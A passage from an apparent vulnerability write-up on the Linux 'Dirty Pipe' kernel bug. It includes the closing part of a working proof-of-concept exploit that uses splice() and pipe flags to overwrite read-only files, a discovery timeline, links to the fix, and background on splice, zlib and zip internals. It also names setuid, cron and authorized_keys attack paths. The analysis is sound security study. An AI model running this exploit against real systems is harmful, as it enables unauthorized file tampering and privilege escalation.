        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);

    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}
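The argument checks in the POC encode the limits of the primitive: the write cannot start on a page boundary (one byte before it has to be spliced from the same page), cannot cross a page boundary, and cannot grow the file. As a sketch, they can be gathered into one predicate; `poc_args_ok` and `POC_PAGE_SIZE` are names invented here, and a 4096-byte page is assumed.

```c
#include <stdbool.h>
#include <stddef.h>

#define POC_PAGE_SIZE 4096L

/* Returns true when (offset, data_size) passes the same checks as the POC
 * for a file of file_size bytes. */
static bool poc_args_ok(long offset, size_t data_size, long file_size)
{
    long next_page = (offset | (POC_PAGE_SIZE - 1)) + 1;
    long end_offset = offset + (long)data_size;

    if (offset % POC_PAGE_SIZE == 0)
        return false;   /* no byte before offset on this page to splice */
    if (end_offset > next_page)
        return false;   /* the write would cross a page boundary */
    if (offset > file_size || end_offset > file_size)
        return false;   /* outside the file, or would enlarge it */
    return true;
}
```

For instance, overwriting 6 bytes at offset 4090 of a large file passes, while 10 bytes at the same offset is rejected because it would spill into the next page.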

VI. The Fix

https://android-review.googlesource.com/c/kernel/common/+/1998671/1/lib/iov_iter.c

https://lore.kernel.org/lkml/20220221100313.1504449-1-max.kellermann@ionos.com/

VII. How the Vulnerability Was Discovered

  • 2021-04-29: first support ticket about file corruption
  • 2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability

The vulnerability clearly had a fairly long life cycle.

Background:

  • zip: The structure of a PKZip file

    • End of central directory record (EOCD); Central directory file header; Structure of the central directory
    • The central directory headers actually all sit at the end of the file. This makes it easy to add new files, and it also lets a zip file be turned into a self-extracting one: just append the header after an executable that contains the zip data (?)
    • The ZIP format can hold collections of files without an external archiver, but is less compact than compressed tarballs holding the same data, because it compresses files individually and cannot take advantage of redundancy between files (solid compression).
  • zlib Sync Flush

    • The “sync flush” is what zlib implements when used with the Z_SYNC_FLUSH flag. It performs the following tasks:

      1. If there is some buffered but not yet compressed data, then this data is compressed into one or several blocks (the type for each block will depend on the amount and nature of data).
      2. A new type 0 block with empty contents is appended.

      A type 0 block with empty contents consists of:

      • the three-bit block header;
      • 0 to 7 bits equal to zero, to achieve byte alignment;
      • the four-byte sequence 00 00 FF FF.
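  • sendfile is a subset of splice. Today's splice can move data in any direction, and either end can be a pipe, a socket, or a file fd. sendfile's own implementation was retired in 2.6.23; the API is still there, but the function doing the work is now do_splice_direct, because splice can easily emulate sendfile.

    • That function goes on to call splice_direct_to_actor. This is a special case helper to splice directly between two points, without requiring an explicit pipe. Internally an allocated pipe is cached in the process, and reused during the lifetime of that process. The pipe acts as a middleman for the data so that the other splice functions can be reused; the pipe only references existing pages anyway.
  • iov_iter and kiocb describe the two ends of one I/O operation: iov_iter describes the memory side and kiocb the file side. The filesystem provides two interfaces that wrap reads and writes around these two structures. For example, call_read_iter calls file->f_op->read_iter, which reads the file data described by kiocb into the memory described by iov_iter.

  • A few other ways to exploit the bug: setuid, cron job, Authorized Keys. The Authorized Keys variant relies on SSH's public-key login mode.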
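Going back to the zlib item in the background list: a sync flush ends with an empty type 0 block, whose last four bytes are 00 00 FF FF once the output is byte-aligned. A minimal sketch of a check for that trailer follows; the helper name `ends_with_sync_flush_marker` is hypothetical and it looks only at the last four bytes, not at the block header bits before them.

```c
#include <stdbool.h>
#include <stddef.h>

/* True when buf[0..len) ends with the four-byte sequence 00 00 FF FF that
 * closes an empty stored (type 0) deflate block. */
static bool ends_with_sync_flush_marker(const unsigned char *buf, size_t len)
{
    static const unsigned char marker[4] = { 0x00, 0x00, 0xFF, 0xFF };

    if (len < 4)
        return false;
    for (size_t i = 0; i < 4; i++) {
        if (buf[len - 4 + i] != marker[i])
            return false;
    }
    return true;
}
```

A match is only a hint that a stream was flushed at that point, since the same four bytes can also occur inside compressed data.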


For the rest, see the attached slides.